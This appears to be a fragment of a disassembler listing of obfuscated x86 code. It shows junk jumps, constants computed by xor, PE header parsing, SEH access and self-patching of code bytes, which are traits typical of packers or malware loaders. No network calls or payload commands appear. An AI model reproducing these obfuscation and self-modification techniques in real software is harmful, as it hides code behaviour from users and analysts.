; START OF FUNCTION CHUNK FOR sub_43137D
loc_42E605: ; CODE XREF: sub_43137D+C�j
jmp loc_42E1C3
; END OF FUNCTION CHUNK FOR sub_43137D
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_10. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_88. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43094F
loc_42E610: ; CODE XREF: sub_43094F+1A94�j
jmp loc_42E40E
; END OF FUNCTION CHUNK FOR sub_43094F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42E615: ; CODE XREF: sub_43119E-199D�j
jmp loc_4310D1
; END OF FUNCTION CHUNK FOR sub_43119E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_62. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42E61B: ; CODE XREF: j8.b78ws:0042E0A9�j
jmp loc_431BC4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
db 31h, 1, 0
dd 0FBF0E800h, 19E9FFFFh, 0C3000011h
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_40. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42E635: ; CODE XREF: sub_43119E-2352�j
and edx, 0CBCBFE90h
xor edx, 558DB915h
call sub_432702
push eax
jmp loc_431C22
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_42E64C proc near ; DATA XREF: sub_432587+1�o
push 1196E634h
pop edi
add edi, 0EEAC3604h
push offset loc_43064A
jmp loc_431974
sub_42E64C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_432715
loc_42E662: ; CODE XREF: sub_432715+E�j
pop ecx
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_432715
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4326DF
loc_42E666: ; CODE XREF: sub_432786-855�j
; sub_4326DF:loc_4326ED�j
push offset sub_431845
jmp nullsub_74
; END OF FUNCTION CHUNK FOR sub_4326DF
; =============== S U B R O U T I N E =======================================
sub_42E670 proc near ; CODE XREF: j8.b78ws:0042E226�p
push 29D6F9C9h
pop eax
xor eax, 8A52230Fh
push offset loc_430686
jmp j_nullsub_57
sub_42E670 endp
; ---------------------------------------------------------------------------
loc_42E686: ; CODE XREF: j8.b78ws:00431981�j
shl ebp, 1Fh
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42E689: ; CODE XREF: sub_43119E:loc_43196E�j
add eax, 7334C974h
call sub_4322BE
; END OF FUNCTION CHUNK FOR sub_43119E
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_42E694: ; CODE XREF: sub_42ED88-D6C�j
jmp loc_42F8E4
; END OF FUNCTION CHUNK FOR sub_42ED88
; =============== S U B R O U T I N E =======================================
sub_42E699 proc near ; DATA XREF: sub_431F53+10�o
; FUNCTION CHUNK AT 004302E9 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004305CE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004320C1 SIZE 00000010 BYTES
call sub_42E0DE
push eax
call sub_430D58
mov edx, [ebp+8]
mov eax, [edx]
add edx, 4
xor [edx], eax
loc_42E6AE: ; CODE XREF: j8.b78ws:loc_430B08�j
jmp loc_4320C1
sub_42E699 endp
; =============== S U B R O U T I N E =======================================
sub_42E6B3 proc near ; CODE XREF: sub_4306C9:loc_431BEB�p
; j8.b78ws:004327A0�j
; FUNCTION CHUNK AT 0042F7D5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004324F6 SIZE 00000005 BYTES
mov [esp+0], ecx
pop ecx
mov ds:dword_42E080, eax
lea eax, [ebp-14h]
xor edx, edx
call sub_42EBA9
jmp loc_4324F6
sub_42E6B3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4314D8
loc_42E6CB: ; CODE XREF: sub_4314D8:loc_431595�j
mov ebp, ebx
pop ebx
mov eax, ds:dword_4300A4
or eax, eax
jnz loc_42F9FA
call sub_432300
mov edx, 0BB931B55h
call sub_432702
jmp loc_43135A
; END OF FUNCTION CHUNK FOR sub_4314D8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
add eax, offset nullsub_2
mov byte ptr [eax], 0C3h
call sub_432300
mov edx, 0A22F8A70h
push offset loc_430AE4
jmp loc_4302DB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_72. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430223
loc_42E70E: ; CODE XREF: sub_430223+1F9D�j
jmp loc_431CED
; END OF FUNCTION CHUNK FOR sub_430223
; =============== S U B R O U T I N E =======================================
sub_42E713 proc near ; CODE XREF: sub_4314D8-17A�p
; j8.b78ws:00431B5A�j
; FUNCTION CHUNK AT 0042F9EA SIZE 00000010 BYTES
mov [esp+0], eax
pop eax
push edx
push 3631321Fh
pop edx
jmp loc_42F9EA
sub_42E713 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4306C9
loc_42E723: ; CODE XREF: sub_4306C9+C�j
mov eax, offset dword_42E07C
call sub_430C12
cmp ds:dword_42E080, 0
jnz loc_42F7DF
lea edx, [ebp+var_14]
mov eax, offset dword_42E084
call sub_42EBA9
lea eax, [ebp+var_14]
jmp loc_4318FD
; END OF FUNCTION CHUNK FOR sub_4306C9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E1B3
loc_42E74F: ; CODE XREF: sub_42E1B3+28BD�j
call sub_4302E0
retn
; END OF FUNCTION CHUNK FOR sub_42E1B3
; =============== S U B R O U T I N E =======================================
sub_42E755 proc near ; CODE XREF: j8.b78ws:loc_430090�j
; sub_430A1F+4�p
push offset sub_42E972
jmp j_nullsub_89
sub_42E755 endp
; ---------------------------------------------------------------------------
ror edi, 2
jmp loc_4326DE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E10C
loc_42E767: ; CODE XREF: sub_42E10C:loc_431C30�j
push offset sub_42ED04
jmp j_nullsub_40
; END OF FUNCTION CHUNK FOR sub_42E10C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42E771 proc near ; CODE XREF: sub_42E825+32F�j
retn
sub_42E771 endp
; ---------------------------------------------------------------------------
ror ecx, 8
jmp sub_43237F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E4AA
loc_42E77A: ; CODE XREF: sub_42E4AA:loc_42F881�j
cmp ax, 0A5B3h
jnz loc_42FFD6
retn
; END OF FUNCTION CHUNK FOR sub_42E4AA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FFCD
loc_42E785: ; CODE XREF: sub_42FFCD-10D6�j
jmp loc_4308FD
; END OF FUNCTION CHUNK FOR sub_42FFCD
; =============== S U B R O U T I N E =======================================
sub_42E78A proc near ; CODE XREF: sub_4315A4+E�p
; FUNCTION CHUNK AT 0042EB34 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00431E26 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00431E32 SIZE 0000000F BYTES
mov eax, large fs:0
jmp loc_42EB34
sub_42E78A endp
; =============== S U B R O U T I N E =======================================
sub_42E796 proc near ; CODE XREF: j8.b78ws:00431988�j
; sub_43119E+140B�p
; FUNCTION CHUNK AT 0042E57C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043065D SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
push 0BF5DC5F6h
pop edx
rol edx, 12h
add edx, 0E867ED94h
jmp loc_43065D
sub_42E796 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301DE
loc_42E7AE: ; CODE XREF: sub_4301DE:loc_42EE9E�j
xor esi, 4DC13075h
add esi, 0DB28E131h
xchg esi, [esp+0]
jmp sub_42E482
; END OF FUNCTION CHUNK FOR sub_4301DE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430CB3
loc_42E7C2: ; CODE XREF: sub_430CB3:loc_430CBB�j
call sub_430A75
locret_42E7C7: ; CODE XREF: sub_430D53�j
retn
; END OF FUNCTION CHUNK FOR sub_430CB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430734
loc_42E7C8: ; CODE XREF: sub_430734+8�j
; sub_4313E5+419�j
jmp loc_4303BA
; END OF FUNCTION CHUNK FOR sub_430734
; ---------------------------------------------------------------------------
pop esi
jmp sub_430790
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_91. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431AFE
loc_42E7D4: ; CODE XREF: sub_431AFE:loc_42E7FC�j
push eax
call sub_4302E0
retn
; END OF FUNCTION CHUNK FOR sub_431AFE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_78. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430DCF
loc_42E7DC: ; CODE XREF: sub_430DCF+A�j
call sub_42E24A
sbb esi, edi
jmp loc_432856
; END OF FUNCTION CHUNK FOR sub_430DCF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_40. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42E7E9: ; CODE XREF: j8.b78ws:0042EC44�j
jl loc_42E3CC
; =============== S U B R O U T I N E =======================================
sub_42E7EF proc near ; CODE XREF: j8.b78ws:loc_42E4F1�p
mov [esp+0], edx
pop edx
mov [ebx], eax
pop ebx
retn
sub_42E7EF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42E7F7: ; CODE XREF: j8.b78ws:0042FF37�j
jmp locret_43124E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431AFE
loc_42E7FC: ; CODE XREF: sub_431AFE-2C53�j
jmp loc_42E7D4
; END OF FUNCTION CHUNK FOR sub_431AFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43058C
loc_42E801: ; CODE XREF: sub_43058C+17�j
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_4302CA
mov eax, [ebp-4]
add eax, 3Ch
mov eax, [eax]
jmp loc_431F3C
; END OF FUNCTION CHUNK FOR sub_43058C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43050F
loc_42E81B: ; CODE XREF: sub_43050F+16�j
mov [ebp-24h], eax
mov eax, [ebp-24h]
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_43050F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E825 proc near ; CODE XREF: sub_43050F+7�p
; sub_43285C-110A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042E091 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EB4F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042FA13 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00431683 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004323E8 SIZE 0000000B BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
jmp loc_42FA13
sub_42E825 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FDAF
loc_42E830: ; CODE XREF: sub_42FDAF+16�j
add eax, 3Ch
mov eax, [eax]
add eax, [ebp-4]
add eax, 18h
call sub_431A47
loc_42E840: ; CODE XREF: sub_430D9F+116D�j
pop ebx
add eax, 0ADF0B1D0h
add eax, ebp
add eax, 2462309Eh
mov eax, [eax]
push eax
jmp sub_43237A
; END OF FUNCTION CHUNK FOR sub_42FDAF
; =============== S U B R O U T I N E =======================================
sub_42E857 proc near ; DATA XREF: sub_4308AB-3A6�o
; FUNCTION CHUNK AT 0043040F SIZE 00000006 BYTES
mov eax, offset dword_42F760
call sub_42EBA9
lea eax, [ebp-14h]
push eax
jmp loc_43040F
sub_42E857 endp
; ---------------------------------------------------------------------------
call sub_42E5A2
; START OF FUNCTION CHUNK FOR sub_4310F6
loc_42E86F: ; CODE XREF: sub_4310F6:loc_430415�j
xchg ebp, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_4310F6
; =============== S U B R O U T I N E =======================================
sub_42E873 proc near ; DATA XREF: sub_4310F6+6�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042F748 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430076 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004317B1 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00431E41 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00431E93 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043241E SIZE 0000000B BYTES
mov eax, ds:dword_4312B8
or eax, eax
jnz loc_42EE68
jmp loc_430076
sub_42E873 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_59. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_94. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42E888: ; CODE XREF: sub_43119E+38F�j
mov eax, [ebp-14h]
mov eax, [eax+18h]
call sub_42E381
loc_42E893: ; CODE XREF: sub_4308C3+19�j
jmp loc_432130
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FCBF
loc_42E898: ; CODE XREF: sub_42FCBF+C�j
cmp dword ptr [eax], 0
jnz loc_432810
jmp sub_430C12
; END OF FUNCTION CHUNK FOR sub_42FCBF
; =============== S U B R O U T I N E =======================================
sub_42E8A6 proc near ; CODE XREF: sub_42FCBF+6�p
; sub_42E9DA:loc_4301A2�j ...
; FUNCTION CHUNK AT 00431D78 SIZE 00000015 BYTES
jns sub_431042
push ebp
mov ebp, esp
jmp loc_431D78
sub_42E8A6 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_76. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42E8B5: ; DATA XREF: sub_430C2C-A5E�o
mov [ebp-9], al
mov al, [ebp-0Ah]
and al, 7
mov [ebp-0Bh], al
xor eax, eax
mov al, [ebp-0Bh]
jmp loc_4300A8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_21. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4315E4
loc_42E8CB: ; CODE XREF: sub_4315E4-B1E�j
jnz loc_42E40E
; END OF FUNCTION CHUNK FOR sub_4315E4
; START OF FUNCTION CHUNK FOR sub_42E3FA
loc_42E8D1: ; CODE XREF: sub_42E3FA+E�j
; sub_43094F+1A8E�j
jns loc_4323A3
cmp dword ptr [ebp-1Ch], 66h
jnz loc_42FA18
mov eax, 6
sub eax, [ebp-0Ch]
jmp loc_43239B
; END OF FUNCTION CHUNK FOR sub_42E3FA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_32. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42E8EF proc near ; DATA XREF: j8.b78ws:0042FD60�o
call sub_4325FC
mov edx, 90F68180h
call sub_42EC54
mov ds:dword_432510, eax
retn
sub_42E8EF endp
; ---------------------------------------------------------------------------
loc_42E904: ; CODE XREF: j8.b78ws:00430D1C�j
jmp loc_42EEC8
; ---------------------------------------------------------------------------
loc_42E909: ; CODE XREF: j8.b78ws:00430AF3�j
mov edx, 0A2CD59D9h
call sub_42EC54
jmp loc_432692
; ---------------------------------------------------------------------------
loc_42E918: ; DATA XREF: sub_430A4D+9�o
mov [ebp-4], eax
xor eax, eax
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_4302CA
call nullsub_2
jmp loc_43029A
; =============== S U B R O U T I N E =======================================
sub_42E934 proc near ; CODE XREF: sub_432702:loc_432086�j
; FUNCTION CHUNK AT 004316A6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432020 SIZE 00000016 BYTES
add esp, 0FFFFFED8h
mov [ebp-8], edx
jmp loc_4316A6
sub_42E934 endp
; ---------------------------------------------------------------------------
adc esi, edx
jbe nullsub_71
jmp sub_431616
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EC9C
loc_42E94F: ; CODE XREF: sub_42EC9C+13�j
call sub_430B0E
; END OF FUNCTION CHUNK FOR sub_42EC9C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_42. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E9DA
loc_42E955: ; CODE XREF: sub_42E9DA+2A65�j
jmp loc_43019D
; END OF FUNCTION CHUNK FOR sub_42E9DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E12B
loc_42E95A: ; CODE XREF: sub_42E12B:loc_432315�j
xchg ebx, [esp+4+var_4]
jmp j_nullsub_62
; END OF FUNCTION CHUNK FOR sub_42E12B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E5CA
loc_42E962: ; CODE XREF: sub_42E5CA+12�j
mov eax, [ebp-14h]
; END OF FUNCTION CHUNK FOR sub_42E5CA
; START OF FUNCTION CHUNK FOR sub_42EA96
loc_42E965: ; CODE XREF: sub_42EA96+2A19�j
mov eax, [eax+24h]
push offset sub_42FA02
jmp nullsub_81
; END OF FUNCTION CHUNK FOR sub_42EA96
; =============== S U B R O U T I N E =======================================
sub_42E972 proc near ; DATA XREF: sub_42E755�o
js sub_4310F6
push ebp
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_4312C1
sub_42E972 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4313A8
loc_42E983: ; CODE XREF: sub_4313A8+15�j
cmp edi, 679C78F3h
jmp loc_43150D
; END OF FUNCTION CHUNK FOR sub_4313A8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_41. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42E98F: ; CODE XREF: sub_43119E:loc_430CC6�j
or eax, edx
mov edx, [ebp+8]
mov [edx-8], eax
loc_42E997: ; CODE XREF: sub_43119E-23C2�j
; j8.b78ws:0042F93A�j ...
mov eax, [ebp-4]
mov [ebp-8], eax
mov eax, [ebp-8]
mov esp, ebp
jmp loc_431773
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
loc_42E9A7: ; CODE XREF: j8.b78ws:0043006B�j
add esi, 840E88E0h
; =============== S U B R O U T I N E =======================================
sub_42E9AD proc near ; CODE XREF: sub_4318B3-37FD�p
; FUNCTION CHUNK AT 0042E3D1 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042EB85 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00430190 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004305A8 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00430932 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00430D32 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00431A3A SIZE 00000005 BYTES
mov [esp+0], edx
pop edx
lea eax, [ebp-34h]
push eax
mov eax, [ebp-4]
push eax
call sub_43119E
jmp loc_430932
sub_42E9AD endp
; ---------------------------------------------------------------------------
loc_42E9C3: ; CODE XREF: j8.b78ws:0042EC97�j
mov [ebp+0], edi
; =============== S U B R O U T I N E =======================================
sub_42E9C6 proc near ; CODE XREF: sub_42E487:loc_430EFE�p
mov [esp+0], edi
pop edi
test byte ptr [ebp-8], 40h
jz loc_43051F
push ebp
jmp loc_4324D8
sub_42E9C6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E9DA proc near ; CODE XREF: sub_430C91-7D5�p
; j8.b78ws:00431D5D�j
; FUNCTION CHUNK AT 0042E955 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043019D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00431425 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043256D SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
mov eax, [eax]
movzx eax, word ptr [eax+6]
mov [ebp-10h], eax
push 106A9D20h
pop eax
xor eax, 348FADD3h
jmp loc_43256D
sub_42E9DA endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_26. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_432112
loc_42E9F9: ; CODE XREF: sub_432112+19�j
jmp loc_431CF5
; END OF FUNCTION CHUNK FOR sub_432112
; ---------------------------------------------------------------------------
loc_42E9FE: ; DATA XREF: sub_430110+10�o
mov eax, [ebp+8]
test byte ptr [eax-7], 10h
jz loc_431A05
inc dword ptr [ebp-8]
; START OF FUNCTION CHUNK FOR sub_43194A
loc_42EA0E: ; CODE XREF: sub_43194A:loc_42E0BB�j
; sub_43194A+A�j
mov eax, [ebp-8]
pop ecx
pop ecx
jmp loc_431FC4
; END OF FUNCTION CHUNK FOR sub_43194A
; =============== S U B R O U T I N E =======================================
sub_42EA18 proc near ; CODE XREF: j8.b78ws:0042FD99�j
; sub_43094F+10CE�p
; FUNCTION CHUNK AT 004304F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430944 SIZE 0000000B BYTES
xchg edi, [esp+0]
pop edi
mov eax, [eax]
mov eax, 1
jmp loc_4304F0
sub_42EA18 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42EA28 proc near ; DATA XREF: sub_43119E-23E6�o
; FUNCTION CHUNK AT 0042FBAA SIZE 00000009 BYTES
jns loc_42FBAA
call sub_431BAC
loc_42EA33: ; CODE XREF: sub_430464+F�j
jmp nullsub_11
sub_42EA28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42EA38 proc near ; CODE XREF: sub_42EBA9+43�j
jmp sub_42EE05
sub_42EA38 endp
; ---------------------------------------------------------------------------
loc_42EA3D: ; CODE XREF: j8.b78ws:00430FD9�j
xchg ebx, [esp]
push ecx
pushf
push 0EBC8513h
pop ecx
or ecx, 4A2CD46Fh
jmp loc_431C46
; ---------------------------------------------------------------------------
pop esi
jmp loc_430461
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431A67
loc_42EA59: ; CODE XREF: sub_431A67+F�j
jnz loc_432213
jmp loc_43146E
; END OF FUNCTION CHUNK FOR sub_431A67
; ---------------------------------------------------------------------------
or eax, edx
jmp loc_4327E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E0DE
loc_42EA6B: ; CODE XREF: sub_42E0DE+5�j
mov [esp+4+var_4], ebp
mov ebp, esp
call sub_432728
; END OF FUNCTION CHUNK FOR sub_42E0DE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_44. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
test edi, esi
jmp loc_431609
; ---------------------------------------------------------------------------
push 0
call sub_42E1FD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_14. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42EA85 proc near ; CODE XREF: sub_42FF81+3�j
jmp loc_4311BA
sub_42EA85 endp
; =============== S U B R O U T I N E =======================================
sub_42EA8A proc near ; CODE XREF: sub_42F992-174D�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042EC65 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043204F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00432441 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004326C6 SIZE 00000005 BYTES
push ebp
jmp loc_4326C6
sub_42EA8A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42EA90: ; CODE XREF: j8.b78ws:0042EEEC�j
jl nullsub_23
; =============== S U B R O U T I N E =======================================
sub_42EA96 proc near ; CODE XREF: sub_42E2FE:loc_431BC4�p
; FUNCTION CHUNK AT 0042E965 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042EC4A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043041A SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00430673 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004312F3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004314A7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00431A57 SIZE 00000005 BYTES
mov [esp+0], eax
pop eax
call sub_431A67
test eax, eax
jnz loc_4312F3
jmp loc_42EC4A
sub_42EA96 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42EAAC: ; DATA XREF: sub_430848+6�o
xor edx, edx
push edx
push eax
mov eax, [ebp-18h]
shl eax, 2
cdq
jmp loc_42E4FB
; ---------------------------------------------------------------------------
adc edx, ecx
pushf
jmp sub_431F6D
; ---------------------------------------------------------------------------
mov eax, 0E1667CE3h
jmp loc_42FED1
; =============== S U B R O U T I N E =======================================
sub_42EACE proc near ; CODE XREF: sub_430478�j
; DATA XREF: sub_430464+A�o
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
push offset loc_432539
jmp loc_431BA6
sub_42EACE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42EADE: ; CODE XREF: sub_430C91:loc_42EE51�j
; sub_43119E:loc_4312A0�j
jnz loc_431271
mov eax, ebx
jmp loc_4302D6
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_42EAEB proc near ; CODE XREF: sub_42E2AD+12�p
; sub_42EC9C+4�p ...
mov eax, [ebx+ecx]
xor eax, [ebx+ecx+4]
cmp eax, 7C61090Eh
loc_42EAF7: ; CODE XREF: sub_431F6D:loc_430234�j
jmp j_nullsub_9
sub_42EAEB endp
; =============== S U B R O U T I N E =======================================
sub_42EAFC proc near ; CODE XREF: sub_42EBA9+4E�j
; sub_430C91:loc_42FDD4�p
; FUNCTION CHUNK AT 0042E145 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EB19 SIZE 00000015 BYTES
xchg edx, [esp+0]
pop edx
mov edx, [ebp-20h]
movzx edx, byte ptr [edx]
jmp loc_42E145
sub_42EAFC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push eax
rol eax, 9
push offset sub_432587
jmp loc_431E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAFC
loc_42EB19: ; CODE XREF: sub_42EAFC:loc_42E145�j
or eax, edx
mov [ebp-1Ch], eax
call sub_432112
or eax, 861FB46Ah
jmp sub_4301B9
; END OF FUNCTION CHUNK FOR sub_42EAFC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_66. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_62. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E78A
loc_42EB34: ; CODE XREF: sub_42E78A+7�j
; sub_42E78A:loc_431E26�j ...
jb loc_431E32
cmp dword ptr [eax], 0FFFFFFFFh
mov ebx, [eax+4]
mov eax, [eax]
jmp loc_431E26
; END OF FUNCTION CHUNK FOR sub_42E78A
; ---------------------------------------------------------------------------
xchg ebx, [ebp+0]
jmp sub_42FD11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E825
loc_42EB4F: ; CODE XREF: sub_42E825:loc_42E091�j
push offset sub_42E3FA
jmp sub_42E771
; END OF FUNCTION CHUNK FOR sub_42E825
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42EB59 proc near ; CODE XREF: sub_42FE87:loc_42FE8F�j
retn
sub_42EB59 endp
; =============== S U B R O U T I N E =======================================
sub_42EB5A proc near ; CODE XREF: sub_430A1F+9�p
; j8.b78ws:00430C02�p ...
; FUNCTION CHUNK AT 0042ECCE SIZE 00000006 BYTES
jb sub_4325CC
loc_42EB60: ; CODE XREF: sub_43094F:loc_43095B�j
push ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_42ECCE
sub_42EB5A endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_56. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E14A
loc_42EB6D: ; CODE XREF: sub_42E14A+1A93�j
jmp loc_42E150
; END OF FUNCTION CHUNK FOR sub_42E14A
; ---------------------------------------------------------------------------
loc_42EB72: ; CODE XREF: j8.b78ws:0042FCAA�j
shl eax, cl
mov cl, [ebp-0Bh]
xor edx, edx
mov dl, [ebp-9]
shr edx, cl
or eax, edx
jmp loc_42F7C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E9AD
loc_42EB85: ; CODE XREF: sub_42E9AD+1C12�j
pop eax
and eax, 0E963611Dh
add eax, 4AE85175h
xor eax, 8B29757Ah
call sub_42E584
push offset loc_4309CC
jmp nullsub_85
; END OF FUNCTION CHUNK FOR sub_42E9AD
; ---------------------------------------------------------------------------
